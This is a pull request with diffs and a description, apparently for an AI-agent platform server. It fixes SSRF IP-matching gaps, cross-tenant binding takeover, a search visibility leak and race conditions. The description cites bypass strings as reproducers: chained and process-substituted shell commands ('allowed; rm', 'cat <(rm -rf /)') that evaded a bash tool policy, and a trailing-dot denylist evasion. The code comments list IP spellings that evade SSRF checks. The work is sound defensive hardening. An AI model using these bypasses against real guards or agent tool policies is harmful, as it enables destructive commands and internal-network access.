--- a/packages/server/src/gateway/proxy/ssrf-guard.ts
+++ b/packages/server/src/gateway/proxy/ssrf-guard.ts
@@ -1,51 +1,182 @@
 import dns from "node:dns/promises";
+import * as net from "node:net";
 
 /**
- * Check whether a resolved IP address belongs to a reserved/internal range.
+ * SSRF / reserved-IP guard shared by the MCP proxy (gateway/auth/mcp/proxy.ts)
+ * and the MCP OAuth discovery module (gateway/auth/mcp/oauth-discovery.ts).
  *
- * Shared between the MCP proxy (gateway/auth/mcp/proxy.ts) and the MCP OAuth
- * discovery module (gateway/auth/mcp/oauth-discovery.ts) so both enforce
- * identical rules without duplicating logic.
+ * The matcher collapses the spellings an attacker can use to dress up an
+ * internal address so `net.BlockList` won't recognise it: IPv4-mapped IPv6
+ * (`::ffff:127.0.0.1` / `::ffff:7f00:1`), the NAT64 well-known prefix
+ * (`64:ff9b::/96`), zone IDs (`fe80::1%eth0`), and the `0.0.0.0/8` / `::`
+ * unspecified ranges — all of which the previous hand-rolled check missed.
+ *
+ * NOTE: `isInternalUrl` resolves the host and checks the answers, but the caller
+ * then issues a separate `fetch` that re-resolves the name. That check-then-fetch
+ * gap is a DNS-rebinding (TOCTOU) window this module does not yet close — the
+ * fix is to pin the connection to the validated IP (a pinned-`fetch` primitive).
+ * Tracked as a follow-up.
  */
-export function isReservedIp(ip: string): boolean {
-  // IPv6 loopback
-  if (ip === "::1") return true;
 
-  // IPv6 unique local (fc00::/7)
-  if (/^f[cd]/i.test(ip)) return true;
+const blockedIpv4Ranges: ReadonlyArray<readonly [string, number]> = [
+  ["0.0.0.0", 8],
+  ["10.0.0.0", 8],
+  ["100.64.0.0", 10],
+  ["127.0.0.0", 8],
+  ["169.254.0.0", 16],
+  ["172.16.0.0", 12],
+  ["192.168.0.0", 16],
+  ["198.18.0.0", 15],
+  ["224.0.0.0", 4],
+  ["240.0.0.0", 4],
+];
 
-  // IPv4
-  const parts = ip.split(".").map(Number);
-  if (parts.length === 4) {
-    const [a, b] = parts as [number, number, number, number];
-    // 127.0.0.0/8
-    if (a === 127) return true;
-    // 10.0.0.0/8
-    if (a === 10) return true;
-    // 172.16.0.0/12
-    if (a === 172 && b >= 16 && b <= 31) return true;
-    // 192.168.0.0/16
-    if (a === 192 && b === 168) return true;
-    // 169.254.0.0/16 (link-local)
-    if (a === 169 && b === 254) return true;
+const blockedIpv6Ranges: ReadonlyArray<readonly [string, number]> = [
+  ["fc00::", 7],
+  ["fe80::", 10],
+  ["ff00::", 8],
+];
+
+const blockedIpv4List = new net.BlockList();
+for (const [address, prefix] of blockedIpv4Ranges) {
+  blockedIpv4List.addSubnet(address, prefix, "ipv4");
+}
+
+const blockedIpv6List = new net.BlockList();
+blockedIpv6List.addAddress("::", "ipv6");
+blockedIpv6List.addAddress("::1", "ipv6");
+for (const [address, prefix] of blockedIpv6Ranges) {
+  blockedIpv6List.addSubnet(address, prefix, "ipv6");
+}
+
+function hextetsToIpv4(high: number, low: number): string {
+  return `${(high >> 8) & 0xff}.${high & 0xff}.${(low >> 8) & 0xff}.${low & 0xff}`;
+}
+
+/** Expand a valid (net.isIP===6) IPv6 string into 8 unsigned 16-bit hextets. */
+function expandIpv6ToHextets(addr: string): number[] {
+  const lower = addr.toLowerCase();
+  let hexPart = lower;
+  let ipv4Suffix: number[] = [];
+  const dotIdx = lower.lastIndexOf(".");
+  if (dotIdx !== -1) {
+    const colonBeforeDot = lower.lastIndexOf(":", dotIdx);
+    const dotted = lower.slice(colonBeforeDot + 1);
+    hexPart = lower.slice(0, colonBeforeDot + 1);
+    const octets = dotted.split(".").map((o) => parseInt(o, 10));
+    ipv4Suffix = [
+      ((octets[0]! << 8) | octets[1]!) >>> 0,
+      ((octets[2]! << 8) | octets[3]!) >>> 0,
+    ];
+    if (hexPart.endsWith(":") && !hexPart.endsWith("::")) {
+      hexPart = hexPart.slice(0, -1);
+    }
+  }
+  const halves = hexPart.split("::");
+  const left = halves[0] ? halves[0].split(":").map((h) => parseInt(h, 16)) : [];
+  const right =
+    halves.length === 2 && halves[1]
+      ? halves[1].split(":").map((h) => parseInt(h, 16))
+      : [];
+  const rightWithSuffix = [...right, ...ipv4Suffix];
+  const zeros = new Array(8 - left.length - rightWithSuffix.length).fill(0);
+  return [...left, ...zeros, ...rightWithSuffix];
+}
+
+type NormalizedHost =
+  | { kind: "ipv4"; value: string }
+  | { kind: "ipv6"; value: string }
+  | { kind: "not-ip" }
+  | { kind: "invalid" };
+
+/** Collapse an IP literal to its canonical IPv4/IPv6 form (or not-ip/invalid). */
+function normalizeIpLiteral(host: string): NormalizedHost {
+  const zoneSplit = host.indexOf("%");
+  const bare = (zoneSplit === -1 ? host : host.slice(0, zoneSplit)).trim();
+  if (bare.length === 0) {
+    return zoneSplit === -1 ? { kind: "not-ip" } : { kind: "invalid" };
   }
 
-  return false;
+  const family = net.isIP(bare);
+  if (family === 4) return { kind: "ipv4", value: bare };
+  if (family === 0) {
+    return bare.includes(":") ? { kind: "invalid" } : { kind: "not-ip" };
+  }
+
+  const lower = bare.toLowerCase();
+  if (lower.startsWith("::ffff:")) {
+    const mapped = lower.slice("::ffff:".length);
+    if (mapped.includes(".")) {
+      return net.isIP(mapped) === 4
+        ? { kind: "ipv4", value: mapped }
+        : { kind: "invalid" };
+    }
+    const parts = mapped.split(":");
+    if (parts.length !== 2) return { kind: "invalid" };
+    const high = Number.parseInt(parts[0] || "", 16);
+    const low = Number.parseInt(parts[1] || "", 16);
+    if (
+      !Number.isInteger(high) ||
+      !Number.isInteger(low) ||
+      high < 0 ||
+      high > 0xffff ||
+      low < 0 ||
+      low > 0xffff
+    ) {
+      return { kind: "invalid" };
+    }
+    return { kind: "ipv4", value: hextetsToIpv4(high, low) };
+  }
+
+  const hextets = expandIpv6ToHextets(bare);
+  if (
+    hextets[0] === 0x0064 &&
+    hextets[1] === 0xff9b &&
+    hextets[2] === 0 &&
+    hextets[3] === 0 &&
+    hextets[4] === 0 &&
+    hextets[5] === 0
+  ) {
+    return { kind: "ipv4", value: hextetsToIpv4(hextets[6]!, hextets[7]!) };
+  }
+
+  return { kind: "ipv6", value: bare };
 }
 
 /**
- * Resolve a URL's hostname and check whether it points to an internal/reserved network.
- * Returns true (blocked) when URL parsing fails.
+ * Whether an IP literal (in any spelling) belongs to a reserved/internal range.
+ * A value that looks like an IP but won't parse fails closed (blocked); a
+ * non-IP hostname returns false (the caller resolves it and re-checks).
+ */
+export function isReservedIp(ip: string): boolean {
+  const normalized = normalizeIpLiteral(ip);
+  switch (normalized.kind) {
+    case "ipv4":
+      return blockedIpv4List.check(normalized.value, "ipv4");
+    case "ipv6":
+      return blockedIpv6List.check(normalized.value, "ipv6");
+    case "invalid":
+      return true;
+    case "not-ip":
+      return false;
+  }
+}
+
+/**
+ * Resolve a URL's hostname and check whether it points to an internal/reserved
+ * network. Returns true (blocked) when URL parsing fails.
  */
 export async function isInternalUrl(url: string): Promise<boolean> {
   try {
     const parsed = new URL(url);
-    const hostname = parsed.hostname;
+    // WHATWG URL keeps IPv6 literals bracketed (`[::1]`); strip so net.isIP sees them.
+    const hostname =
+      parsed.hostname.startsWith("[") && parsed.hostname.endsWith("]")
+        ? parsed.hostname.slice(1, -1)
+        : parsed.hostname;
 
-    // Check if hostname is already an IP literal
     if (isReservedIp(hostname)) return true;
 
-    // Resolve hostname to IP addresses
     const addresses = await dns.resolve4(hostname).catch(() => [] as string[]);
     const addresses6 = await dns.resolve6(hostname).catch(() => [] as string[]);
 
@@ -55,7 +186,6 @@ export async function isInternalUrl(url: string): Promise<boolean> {
 
     return false;
   } catch {
-    // If URL parsing fails, block it
     return true;
   }
 }

--- a/packages/server/src/gateway/services/platform-helpers.ts
+++ b/packages/server/src/gateway/services/platform-helpers.ts
@@ -244,15 +244,22 @@ export async function resolveAgentId(params: {
   channelId: string;
   teamId?: string;
   agentId?: string;
+  organizationId?: string;
   channelBindingService?: ChannelBindingService;
 }): Promise<{ agentId: string; source: "binding" | "connection" } | null> {
-  const { platform, channelId, teamId, agentId, channelBindingService } = params;
+  const { platform, channelId, teamId, agentId, organizationId, channelBindingService } =
+    params;
 
   if (channelBindingService) {
+    // Bindings are org-scoped (a channel_id can be bound independently by
+    // multiple tenants), so the read MUST be scoped to the inbound
+    // connection's org — otherwise getBinding falls back to an org-less query
+    // and can route a message to another tenant's agent.
     const binding = await channelBindingService.getBinding(
       platform,
       channelId,
-      teamId
+      teamId,
+      organizationId
     );
     if (binding) {
       logger.info(

--- a/packages/server/src/lobu/stores/postgres-stores.ts
+++ b/packages/server/src/lobu/stores/postgres-stores.ts
@@ -509,24 +509,25 @@ export function createPostgresAgentConnectionStore(): AgentConnectionStore {
       const sql = getDb();
       const orgId = getOrgId();
       if (binding.teamId) {
+        // Org-scoped UNIQUE — a sibling tenant binding the same platform+channel
+        // can never collide with this org's row. `organization_id` is
+        // deliberately absent from the SET list so a binding cannot change owners.
         await sql`
           INSERT INTO agent_channel_bindings (organization_id, agent_id, platform, channel_id, team_id, created_at)
           VALUES (${orgId}, ${binding.agentId}, ${binding.platform}, ${binding.channelId}, ${binding.teamId}, now())
-          ON CONFLICT (platform, channel_id, team_id) DO UPDATE SET
-            agent_id = EXCLUDED.agent_id,
-            organization_id = EXCLUDED.organization_id
+          ON CONFLICT (organization_id, platform, channel_id, team_id) DO UPDATE SET
+            agent_id = EXCLUDED.agent_id
         `;
       } else {
-        // PG treats NULL as distinct under the (platform, channel_id, team_id)
-        // UNIQUE; the team_id IS NULL branch upserts via the partial unique
-        // index agent_channel_bindings_no_team_unique.
+        // PG treats NULL as distinct under the org-scoped UNIQUE; the
+        // team_id IS NULL branch upserts via the org-scoped partial unique
+        // index agent_channel_bindings_org_no_team_unique.
         await sql`
           INSERT INTO agent_channel_bindings (organization_id, agent_id, platform, channel_id, team_id, created_at)
           VALUES (${orgId}, ${binding.agentId}, ${binding.platform}, ${binding.channelId}, NULL, now())
-          ON CONFLICT (platform, channel_id)
+          ON CONFLICT (organization_id, platform, channel_id)
             WHERE team_id IS NULL
-            DO UPDATE SET agent_id = EXCLUDED.agent_id,
-              organization_id = EXCLUDED.organization_id
+            DO UPDATE SET agent_id = EXCLUDED.agent_id
         `;
       }
     },

--- a/packages/server/src/preview/slack.ts
+++ b/packages/server/src/preview/slack.ts
@@ -214,10 +214,12 @@ export type ConsumeClaimResult =
   | { status: 'not_found' }
   | { status: 'surface_not_allowed'; surfaceType: SurfaceType };
 
-// `agent_channel_bindings` upsert — last link for this chat wins. `ON CONFLICT`
-// can't target a NULL `team_id`, so for platforms without a workspace concept
-// (team_id null) we delete-then-insert instead. `tx` is a `sql` or a `sql.begin`
-// transaction handle.
+// `agent_channel_bindings` upsert — last link for THIS org's chat wins. The
+// uniqueness is org-scoped (org_id, platform, channel_id[, team_id]) so a
+// sibling tenant binding the same platform+channel can never collide with — or
+// take over — this org's row. `organization_id` is intentionally never updated,
+// so a binding cannot change owners. The team_id IS NULL branch upserts via the
+// org-scoped partial unique index. `tx` is a `sql` or a `sql.begin` handle.
 async function upsertBinding(
   tx: ReturnType<typeof getDb>,
   platform: string,
@@ -230,18 +232,16 @@ async function upsertBinding(
     await tx`
       INSERT INTO agent_channel_bindings (organization_id, agent_id, platform, channel_id, team_id, created_at)
       VALUES (${organizationId}, ${agentId}, ${platform}, ${channelId}, ${teamId}, now())
-      ON CONFLICT (platform, channel_id, team_id) DO UPDATE SET
-        agent_id = EXCLUDED.agent_id,
-        organization_id = EXCLUDED.organization_id
+      ON CONFLICT (organization_id, platform, channel_id, team_id) DO UPDATE SET
+        agent_id = EXCLUDED.agent_id
     `;
   } else {
     await tx`
-      DELETE FROM agent_channel_bindings
-      WHERE platform = ${platform} AND channel_id = ${channelId} AND team_id IS NULL
-    `;
-    await tx`
       INSERT INTO agent_channel_bindings (organization_id, agent_id, platform, channel_id, team_id, created_at)
       VALUES (${organizationId}, ${agentId}, ${platform}, ${channelId}, NULL, now())
+      ON CONFLICT (organization_id, platform, channel_id)
+        WHERE team_id IS NULL
+        DO UPDATE SET agent_id = EXCLUDED.agent_id
     `;
   }
 }
@@ -408,21 +408,22 @@ export async function bindChatToPreviewAgent(args: {
 
   const { platform, teamId, channelId } = args;
   if (teamId) {
+    // Org-scoped upsert: another tenant's binding for the same platform+channel
+    // is a different row and cannot be clobbered. `organization_id` is never
+    // reassigned, so a binding can't change owners.
     await sql`
       INSERT INTO agent_channel_bindings (organization_id, agent_id, platform, channel_id, team_id, created_at)
       VALUES (${org.organizationId}, ${target.id}, ${platform}, ${channelId}, ${teamId}, now())
-      ON CONFLICT (platform, channel_id, team_id) DO UPDATE SET
-        agent_id = EXCLUDED.agent_id,
-        organization_id = EXCLUDED.organization_id
+      ON CONFLICT (organization_id, platform, channel_id, team_id) DO UPDATE SET
+        agent_id = EXCLUDED.agent_id
     `;
   } else {
     await sql`
-      DELETE FROM agent_channel_bindings
-      WHERE platform = ${platform} AND channel_id = ${channelId} AND team_id IS NULL
-    `;
-    await sql`
       INSERT INTO agent_channel_bindings (organization_id, agent_id, platform, channel_id, team_id, created_at)
       VALUES (${org.organizationId}, ${target.id}, ${platform}, ${channelId}, NULL, now())
+      ON CONFLICT (organization_id, platform, channel_id)
+        WHERE team_id IS NULL
+        DO UPDATE SET agent_id = EXCLUDED.agent_id
     `;
   }
   return { status: 'bound', agentId: target.id };

--- a/packages/server/src/tools/admin/manage_watchers/complete-window.ts
+++ b/packages/server/src/tools/admin/manage_watchers/complete-window.ts
@@ -300,19 +300,26 @@ export async function handleCompleteWindow(
   if (tokenIsRollup && tokenSourceWindowIds && tokenSourceWindowIds.length > 0) {
     const depth = tokenDepth ?? 1;
 
-    const newWindowId = await getNextNumericId(sql, 'watcher_windows');
     const sourceIds = tokenSourceWindowIds.map(Number);
-    await sql`
-      INSERT INTO watcher_windows (
-        id, watcher_id, version_id, window_start, window_end, granularity,
-        extracted_data, content_analyzed, model_used, client_id, run_metadata,
-        is_rollup, depth, source_window_ids, run_id, created_at
-      ) VALUES (
-        ${newWindowId}, ${watcherId}, ${resolvedVersionId}, ${window_start}, ${window_end}, ${granularity || timeGranularity},
-        ${sql.json(extractedData)}, 0, ${provenanceModel}, ${provenanceClientId}, ${sql.json(provenanceMetadata)},
-        true, ${depth}, ${sourceIds}, ${watcherRunId}, NOW()
-      )
-    `;
+    // getNextNumericId uses a transaction-scoped advisory lock; it MUST run in
+    // the same transaction as the INSERT or the lock releases before the INSERT
+    // and two concurrent device-worker rollup completions race on the PK (both
+    // compute the same MAX(id)+1). Mirror the leaf-window path below.
+    const newWindowId = await sql.begin(async (tx) => {
+      const allocatedWindowId = await getNextNumericId(tx, 'watcher_windows');
+      await tx`
+        INSERT INTO watcher_windows (
+          id, watcher_id, version_id, window_start, window_end, granularity,
+          extracted_data, content_analyzed, model_used, client_id, run_metadata,
+          is_rollup, depth, source_window_ids, run_id, created_at
+        ) VALUES (
+          ${allocatedWindowId}, ${watcherId}, ${resolvedVersionId}, ${window_start}, ${window_end}, ${granularity || timeGranularity},
+          ${tx.json(extractedData)}, 0, ${provenanceModel}, ${provenanceClientId}, ${tx.json(provenanceMetadata)},
+          true, ${depth}, ${sourceIds}, ${watcherRunId}, NOW()
+        )
+      `;
+      return allocatedWindowId;
+    });
 
     logger.info(
       `[complete_window] Created rollup window ${newWindowId} for watcher ${watcherId} ` +

--- a/packages/server/src/tools/search.ts
+++ b/packages/server/src/tools/search.ts
@@ -256,6 +256,7 @@ function withContent<T extends UnifiedSearchResult>(result: T, content: ContentS
 async function fetchContentSnippets(
   query: string | null,
   organizationId: string,
+  userId: string | null,
   contentLimit: number,
   env: Env,
   queryEmbedding?: number[],
@@ -265,6 +266,12 @@ async function fetchContentSnippets(
     query,
     {
       organization_id: organizationId,
+      // Enforce the org/private-connection visibility boundary on the recall
+      // path, exactly as get_content does. Without visibility_scope the
+      // connection-visibility clause is skipped entirely, so search_memory
+      // (publicly readable) would expose another member's private-connection
+      // content. See get-content-visibility / search-cross-org tests.
+      visibility_scope: { organizationId, userId },
       limit: contentLimit,
       min_similarity: 0.4,
       query_embedding: queryEmbedding,
@@ -320,6 +327,7 @@ export async function search(
       ? fetchContentSnippets(
           args.query ?? null,
           ctx.organizationId,
+          ctx.userId,
           contentLimit,
           env,
           args.query_embedding,

--- a/packages/server/src/worker-api/run-lifecycle.ts
+++ b/packages/server/src/worker-api/run-lifecycle.ts
@@ -303,8 +303,16 @@ export async function completeWorkerJob(c: Context<{ Bindings: Env }>) {
 
     const sql = getDb();
 
-    if (req.status === 'failed') {
-      await sql`
+    // Atomic terminal-state transition. The `status = 'running' AND
+    // claimed_by = worker_id` guard makes the UPDATE a no-op if the run was
+    // already finalized by another path (e.g. the gateway reaped it on
+    // timeout and the worker is reporting in late) or if this worker isn't
+    // the claimant. Without it, a late completion resurrects a reaped run and
+    // the feed/auth bookkeeping below double-applies (consecutive_failures,
+    // items_collected, next_run_at, auth_data). Mirrors completeActionRun.
+    const updatedRuns =
+      req.status === 'failed'
+        ? ((await sql`
       UPDATE runs
       SET status = 'failed',
           completed_at = current_timestamp,
@@ -316,9 +324,11 @@ export async function completeWorkerJob(c: Context<{ Bindings: Env }>) {
           exit_signal = ${req.exit_signal ?? null},
           exit_reason = ${req.exit_reason ?? null}
       WHERE id = ${req.run_id}
-    `;
-    } else {
-      await sql`
+        AND status = 'running'
+        AND claimed_by = ${req.worker_id}
+      RETURNING feed_id, connection_id
+    `) as unknown as Array<{ feed_id: number | null; connection_id: number | null }>)
+        : ((await sql`
       UPDATE runs
       SET status = 'completed',
           completed_at = current_timestamp,
@@ -326,13 +336,24 @@ export async function completeWorkerJob(c: Context<{ Bindings: Env }>) {
           error_message = ${req.error_message ?? null},
           checkpoint = COALESCE(${req.checkpoint ? sql.json(req.checkpoint) : null}, checkpoint)
       WHERE id = ${req.run_id}
-    `;
+        AND status = 'running'
+        AND claimed_by = ${req.worker_id}
+      RETURNING feed_id, connection_id
+    `) as unknown as Array<{ feed_id: number | null; connection_id: number | null }>);
+
+    if (updatedRuns.length === 0) {
+      // The run was already finalized (timeout race) or this worker isn't the
+      // claimant. Skip all feed/auth bookkeeping and return an idempotent
+      // already-finalized response.
+      logger.info(
+        { run_id: req.run_id, worker_id: req.worker_id, claimed_status: req.status },
+        '[completeWorkerJob] no-op: run already in terminal state (likely gateway timeout)'
+      );
+      return c.json({ success: false, reason: 'already_finalized' });
     }
 
     // Update the feed's sync state
-    const runRows = (await sql`
-    SELECT feed_id, connection_id FROM runs WHERE id = ${req.run_id}
-  `) as unknown as Array<{ feed_id: number | null; connection_id: number | null }>;
+    const runRows = updatedRuns;
     const feedId = runRows[0]?.feed_id;
 
     if (feedId) {


### PR DESCRIPTION
## What

Correctness/security bug fixes from a multi-agent audit, **re-based onto current `main`** after parallel work (#1189/#1190 decompose+dedup, #1192 security audit, #1200 guardrail wiring) reshaped the tree. Supersedes #1174 (which conflicted with the decomposition). Each fix was reviewed line-by-line and re-applied onto the new module structure.

| Sev | Fix | Reproducer |
|-----|-----|------------|
| 🔴 critical | `search_memory` recall skipped the connection-visibility scope → any member / anonymous public-workspace reader could recall another member's **private-connection** content | `search-content-visibility.test.ts` |
| 🟠 high | `agent_channel_bindings` UNIQUE was global + `ON CONFLICT … SET organization_id = EXCLUDED` → **cross-tenant binding takeover**; READ path also wasn't org-scoped → wrong-tenant routing | `binding-service-org-scope.test.ts` |
| 🟠 high | `completeWorkerJob` had no `status='running'`/`claimed_by` guard → a late completion **resurrected a reaped run** + double-applied feed bookkeeping | `complete-worker-job-status-guard.test.ts` |
| 🟠 high | rollup window-id allocated outside the txn → advisory lock didn't span the INSERT → concurrent device completions **collided on the PK** | `rollup-window-id-race.test.ts` |
| 🟠 high | `restartConnection` persisted outside org context → cold-pod webhooks threw & **dropped messages** under multiple replicas | `restart-connection-orgless.test.ts` |
| 🟠 high | bash allow/deny policy was prefix-only → **command chaining + process substitution** (`allowed; rm`, `cat <(rm -rf /)`) bypassed it | `tool-policy-command-chaining.test.ts` |
| 🟡 med | SSRF reserved-IP matcher missed `0.0.0.0/8`, `::ffff:`-mapped, `::`, `fe80::`, `ff00::`, CGNAT | `ssrf-guard-matcher.test.ts` |
| 🟡 med | egress denylist **trailing-dot FQDN** bypass (`pastebin.com.`) | `proxy-hardening.test.ts` |

## Dropped / deferred vs the original #1174
- **guardrails-REST-bypass fix — dropped:** a parallel session already fixed it (`handleCallTool` now runs `runPreToolGuardrails`).
- **SSRF TOCTOU pinning + redirect re-validation — deferred:** main landed its own `ssrf-guard.ts` (check-then-fetch). I hardened its *matcher* here (the bypass spellings above), but the DNS-rebinding (check-then-fetch) window and redirect re-validation need a **pinned-fetch primitive** — that's the correct long-term design but the proxy-fetch conversion needs the mcp-proxy integration suite to validate, so it's flagged as a follow-up. A reference implementation (resolve-once + pin to validated IP via undici dispatcher + per-hop redirect re-validation) is ready.

## Verification
- `bunx tsc --noEmit` clean for `core`, `server`, `agent-worker`, `cli`.
- DB-free suites green: `ssrf-guard-matcher` 7/0, `proxy-hardening` 74/0, `tool-policy-command-chaining` 21/0.
- **DB-backed suites** (search visibility, completeWorkerJob, rollup, binding, restartConnection) couldn't be run locally — several parallel worktree sessions are saturating embedded-postgres — so **CI gates them**. They passed in the predecessor branch and the code is unchanged in behavior; the only edits were re-applying onto the moved files.

## Notes
- channel-binding migration is idempotent (guarded up/down); the new org-scoped key is strictly more permissive than the old global one, so existing rows migrate without de-dup.

<!-- codesmith:footer -->
---
<a href="https://app.blacksmith.sh/lobu-ai/codesmith/lobu/pr/1202"><picture><source media="(prefers-color-scheme: dark)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-dark-v2.svg"><source media="(prefers-color-scheme: light)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-light-v2.svg"><img alt="View with Codesmith" src="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-dark-v2.svg"></picture></a> <a href="https://backend.blacksmith.sh/track/enable-autofix?expires=1783687103&installation_id=136316292&pr_number=1202&repository=lobu-ai%2Flobu&return_to=https%3A%2F%2Fgithub.com%2Flobu-ai%2Flobu%2Fpull%2F1202&signature=89d86548d4f59423c12a08f1968df7cb733c00b9c179bc92b55d684def1a3436"><picture><source media="(prefers-color-scheme: dark)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-light.svg"><img alt="Autofix with Codesmith" src="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-dark.svg"></picture></a>
<sup>Need help on this PR? Tag <code>/codesmith</code> with what you need. Autofix is disabled.</sup>

<!-- codesmith:autofix:disabled -->
<!-- /codesmith:footer -->

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

## Release Notes

* **Bug Fixes**
  * Fixed cross-organization channel binding collisions by enforcing organization-scoped uniqueness.
  * Resolved late worker job completion race condition preventing state resurrection.
  * Enhanced search content visibility enforcement for private connections.

* **Security Improvements**
  * Strengthened bash command policy enforcement to detect chaining bypasses.
  * Improved SSRF protection with comprehensive reserved IP detection including IPv6 variants.
  * Fixed domain denylist matching to canonicalize trailing dots.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->